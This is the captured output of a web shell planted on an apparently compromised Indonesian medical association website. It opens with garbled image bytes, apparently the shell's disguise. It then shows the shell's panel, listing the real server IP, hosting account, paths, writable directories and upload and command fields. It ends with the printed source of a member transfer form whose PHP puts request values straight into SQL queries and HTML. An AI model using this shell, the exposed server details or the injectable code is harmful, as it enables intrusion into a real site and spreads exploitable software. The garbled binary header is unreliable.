JFIF ( %!1"%)-...383.7(-.+  -%&--------------------------------------------------"J !1"AQaq2BR#r3Sbs4T$Dd(!1"2AQaq# ?q& JX"-` Es?Bl 1( H6fX[vʆEiB!j{hu85o%TI/*T `WTXط8%ɀt*$PaSIa9gkG$t h&)ٞ)O.4uCm!w*:K*I&bDl"+ ӹ=<Ӷ|FtI{7_/,/T ̫ԷC ȷMq9[1w!R{ U<?СCԀdc8'124,I'3-G s4IcWq$Ro瓩!"j']VӤ'B4H8n)iv$Hb=B:B=YݚXZILcA g$ΕzuPD? !զIEÁ $D'l"gp`+6֏$1Ľ˫EjUpܣvDت\2Wڰ_iIْ/~'cŧE:ɝBn9&rt,H`*Tf֙LK$#d "p/n$J oJ@'I0B+NRwj2GH.BWLOiGP W@#"@ę| 2@P D2[Vj!VE11pHn,c~T;U"H㤑EBxHClTZ7:х5,w=.`,:Lt1tE9""@pȠb\I_IƝpe &܏/ 3, WE2aDK &cy(3nI7'0W էΠ\&@:נ!oZIܻ1j@=So LJ{5UĜiʒP H{^iaH?U2j@<'13nXkdP&%ɰ&-(<]Vlya7 6c1HJcmǸ!˗GB3Ԏߏ\=qIPNĉA)JeJtEJbIxWbdóT V'0 WH*|D u6ӈHZh[8e  $v>p!rIWeB,i '佧 )g#[)m!tahm_<6nL/ BcT{"HSfp7|ybi8'.ih%,wm  403WebShell
403Webshell
Server IP : 88.223.91.186  /  Your IP : 216.73.217.80
Web Server : LiteSpeed
System : Linux id-dci-web1986.main-hosting.eu 5.14.0-611.26.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Jan 29 05:24:47 EST 2026 x86_64
User : u686484674 ( 686484674)
PHP Version : 8.0.30
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/u686484674/domains/idikotabandung.com/public_html/IDI/anggota/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/u686484674/domains/idikotabandung.com/public_html/IDI/anggota/mutasi.php
<?php include "header.php";

	// cek apakah yang mengakses halaman ini sudah login
	if($_SESSION['level']<>"user"){
		header("location:location:../login.php");
	}


 ?>
<style type="text/css">
<!--
-->

@import url(http://fonts.googleapis.com/css?family=Montserrat:400,700);

html{   

  background-size: cover;
  height:100%;
}

#feedback-page{
	text-align:center;
}

#form-main{
	width:100%;
	float:left;
	padding-top:0px;
	
}

#form-div {
	background-image: linear-gradient(to right, #4682B4, #00FFFF, #00FA9A);
	background:url(image/Stethoscope.jpg) no-repeat;
	padding-left:35px;
	padding-right:35px;
	padding-top:35px;
	padding-bottom:50px;
	width: 450px;
	float: left;
	left: 50%;
	position: absolute;
  margin-top:30px;
	margin-left: -260px;
  -moz-border-radius: 7px;
  -webkit-border-radius: 7px;
}

.feedback-input {
	color:#3c3c3c;
	font-family: Helvetica, Arial, sans-serif;
  font-weight:500;
	font-size: 18px;
	border-radius: 0;
	line-height: 22px;
	background-color: #fbfbfb;
	padding: 13px 13px 13px 54px;
	margin-bottom: 10px;
	width:100%;
	-webkit-box-sizing: border-box;
	-moz-box-sizing: border-box;
	-ms-box-sizing: border-box;
	box-sizing: border-box;
  border: 3px solid rgba(0,0,0,0);
}

.feedback-input:focus{
	background: #fff;
	box-shadow: 0;
	border: 3px solid #3498db;
	color: #3498db;
	outline: none;
  padding: 13px 13px 13px 54px;
}

.focused{
	color:#30aed6;
	border:#30aed6 solid 3px;
}

/* Icons ---------------------------------- */
#name{
	background-image: url(http://rexkirby.com/kirbyandson/images/name.svg);
	background-size: 30px 30px;
	background-position: 11px 8px;
	background-repeat: no-repeat;
}

#name:focus{
	background-image: url(http://rexkirby.com/kirbyandson/images/name.svg);
	background-size: 30px 30px;
	background-position: 8px 5px;
  background-position: 11px 8px;
	background-repeat: no-repeat;
}

#email{
	background-image: url(http://rexkirby.com/kirbyandson/images/email.svg);
	background-size: 30px 30px;
	background-position: 11px 8px;
	background-repeat: no-repeat;
}

#email:focus{
	background-image: url(http://rexkirby.com/kirbyandson/images/email.svg);
	background-size: 30px 30px;
  background-position: 11px 8px;
	background-repeat: no-repeat;
}

#comment{
	background-image: url(http://rexkirby.com/kirbyandson/images/comment.svg);
	background-size: 30px 30px;
	background-position: 11px 8px;
	background-repeat: no-repeat;
}

textarea {
    width: 100%;
    height: 150px;
    line-height: 150%;
    resize:vertical;
	padding: 10px;
}

input:hover, textarea:hover,
input:focus, textarea:focus {
	background-color:white;
}

#button-blue{
	font-family: 'Montserrat', Arial, Helvetica, sans-serif;
	float:left;
	width: 100%;
	border: #fbfbfb solid 4px;
	cursor:pointer;
	background-color: #3498db;
	color:white;
	font-size:24px;
	padding-top:22px;
	padding-bottom:22px;
	-webkit-transition: all 0.3s;
	-moz-transition: all 0.3s;
	transition: all 0.3s;
  margin-top:-4px;
  font-weight:700;
}

#button-blue:hover{
	background-color: rgba(0,0,0,0);
	color: #0493bd;
}
	
.submit:hover {
	color: #3498db;
}
	
.ease {
	width: 0px;
	height: 74px;
	background-color: #fbfbfb;
	-webkit-transition: .3s ease;
	-moz-transition: .3s ease;
	-o-transition: .3s ease;
	-ms-transition: .3s ease;
	transition: .3s ease;
}

.submit:hover .ease{
  width:100%;
  background-color:white;
}

@media only screen and (max-width: 580px) {
	#form-div{
		left: 3%;
		margin-right: 3%;
		width: 88%;
		margin-left: 0;
		padding-left: 3%;
		padding-right: 3%;
	}
</style>

<link rel="stylesheet" href="//code.jquery.com/ui/1.12.1/themes/base/jquery-ui.css">
		<script src="https://code.jquery.com/jquery-1.12.4.js"></script>
		<script src="https://code.jquery.com/ui/1.12.1/jquery-ui.js"></script>
	 	<script>
	  		$( function() {
	    		$( "#datepicker" ).datepicker({ dateFormat: 'yy-mm-dd' });
	    		$( "#datepicker2" ).datepicker({ dateFormat: 'yy-mm-dd' });
				$( "#datepicker3" ).datepicker({ dateFormat: 'yy-mm-dd' });
	  		} );
	  	</script>

 
 <body>
 
 <div class="container">


			<?php
			$tglBayar 	= date('Y-m-d');
			?>

			 <?php 

			$no = 1;
				$data = mysqli_query($konek, "SELECT * FROM h_anggota WHERE npm='$_GET[npm]' " );
				
				$hari = date('Y-m-d');
			  $d=mysqli_fetch_array($data);
			 ?>

            
            
            
			  <div id="form-div">
				<p align="center"><strong> FORM DATA PENGAJUAN SRT MUTASI</strong></p>
				<p><label for=""></label>
				<br>
			   </p>
				<form method="post" action="" enctype="multipart/form-data">
				  <label for="tbayar">ID  </label><br>
				  <p class="name"><input name="npm" readonly class="form-control"  value="<?php echo $_GET['npm']  ?>"  />
				  </p>
				  
						<label for="ket">Tanggal Pengajuan</label>
					 <input name="tglreg" class="form-control"  type="date"  value="<?php echo $tglBayar  ?>" size="11">
				  </p> 
				  
				  
				<label for="tbayar">Nama</label>
				<br>
				  <p class="name"><input name="nmlead" readonly placeholder="Isi Nama" class="form-control"  value="<?php echo $d['nmlead']  ?>"  />
				  </p>	
			
			 <label for="jumlah">Alamat</label>
				  <br>
					<input name="alamat" type="text" readonly class="form-control"   placeholder="Isi Alamat" maxlength="30"  value="<?php echo $d['alamat']  ?>" />
				  </p>
				  
					 <label for="bukti" class="merah">No STR </label>
					<input name="nostr" type="text" class="form-control" readonly  value="<?php echo $d['nostr']  ?>"  placeholder="Isi No STR" maxlength="30"/>
				  </p>
			
				 <label for="bukti" class="merah">Penempatan Sekarang: </label>
					  <br>
				
					 <input name="tempat1" class="form-control"  type="text"  placeholder="Isi Tempat sekarang"  value="" size="11">
				  </p>
			
					<label for="jumlah">Mutasi ke:</label>
					<br>
					 <input name="tempat2" type="text" class="form-control"   placeholder="Isi Mutasi ke" maxlength="30" />
				  </p>
				  
				  <label for="pasword">Alasan Mutasi :</label><br>
					 <textarea  name="note"  id="note"  px="px" cols="15" rows="4"></textarea>
				  </p>       
                  
				  
			
					<p>&nbsp;          </p>
					<div class="submit">
					<input type="submit"   id="button-blue" value="Submit" />
					<div class="ease"></div>
				  </div>
				</form>
			
			
			</div>
  </div>
  </div>
   </body>


<!-- proses edit data -->
<?php
if($_SERVER['REQUEST_METHOD']=='POST'){

	//variabel untuk menampung inputan dari form

	$npm 		= $_GET['npm'];
	$tgl_reg 	= $_POST['tglreg'];
	$nmlead 	= $_POST['nmlead'];
    $alamat 	= $_POST['alamat'];
	$nostr 	    = $_POST['nostr'];
    $tempat1 	= $_POST['tempat1'];
	$tempat2 	= $_POST['tempat2'];
	//$tgliuran 	= $_POST['iuran'];
	$note 	= $_POST['note'];
	$hari = date('Y-m-d');
	  $ket 	= "Input data Pengajuan dan Biaya Administrasi";
 
				 
  
   $day = 'MUT';
   $dayList = array(
    'MUT' => 'MUT',
    'AGD' => 'AGD',
    'Allegria' => 'ALG'
	);


// https://www.malasngoding.com
// menghubungkan dengan koneksi database
// mengambil data barang dengan kode paling besar
$query = mysqli_query($konek, "SELECT max(nomut) as kodeTerbesar FROM h_mutasi  ");
$data = mysqli_fetch_array($query);
$kodeBarang = $data['kodeTerbesar'];

 
 
// mengambil angka dari kode barang terbesar, menggunakan fungsi substr
// dan diubah ke integer dengan (int)
$urutan = (int) substr($kodeBarang, -3, 3);
 
// bilangan yang diambil ini ditambah 1 untuk menentukan nomor urut berikutnya
$urutan++;
 
// membentuk kode barang baru
// perintah sprintf("%03s", $urutan); berguna untuk membuat string menjadi 3 karakter
// misalnya perintah sprintf("%03s", 15); maka akan menghasilkan '015'
// angka yang diambil tadi digabungkan dengan kode huruf yang kita inginkan, misalnya BRG 


//$huruf = substr("$project",0, 3);
$huruf =  $dayList[$day];

$kodeid= $huruf . sprintf("%03s", $urutan);

// $project = $_GET ['project'];
 
//$tanggal = '2015-06-03';

 $sqlSiswa = mysqli_query($konek, "SELECT * FROM h_mutasi ");
				 $ceknik=mysqli_num_rows ($sqlSiswa);
				 $dcek=mysqli_fetch_array($sqlSiswa);
				 $cksales= $dcek['nmlead'];

            //query insert dijalankan

				// simpan inputan user ke variabel
					$userInput = array('nmlead' => $nmlead);
			
				  
				   
	if($tgliuran<$hari){
		$iexp ="expired";
		   }else{
		   $iexp ="lunas";
	 			 }
				 
	   if(mbstr<$hari){
		$mbexp ="expired";
		   }else{
		   $mbexp ="valid";
	 			 }

												
	mysqli_query($konek, "INSERT INTO h_mutasi(npm,tgl_reg,nmlead,tahap,nomut,status,alamat,nostr,tempat1,tempat2,pinv,note)
											  values('$npm','$tgl_reg','$nmlead','1','$kodeid','proses','$alamat','$nostr','$tempat1','$tempat2','proses','$note')");				
					
					//	mysqli_query($konek, "INSERT INTO d_progmut(npm,tgl_reg,nmlead,tahap,nomut,status,data,iuran,nostr,mbstr,status2)
							//				  values('$npm','$tgl_reg','$nmlead','1','$kodeid','proses','New','$tgliuran','$nostr','$mbstr','proses')");	
											  
						mysqli_query($konek, "INSERT INTO d_progmut(npm,tgl_reg,nmlead,tahap,nomut,status,data,iuran,nostr,mbstr,status2,note)
											  			values('$npm','$tgl_reg','$nmlead','1','$kodeid','proses','New','$tgliuran','$nostr','$mbstr','proses','$ket')");	
											header("location:index.php?npm=$npm&nmlead=$nmlead&noreg=$kodeid");  		
										}

					
					//echo "$id";
					
				
	

	
	
	//telp
			
			?>


Youez - 2016 - github.com/yon3zu
LinuXploit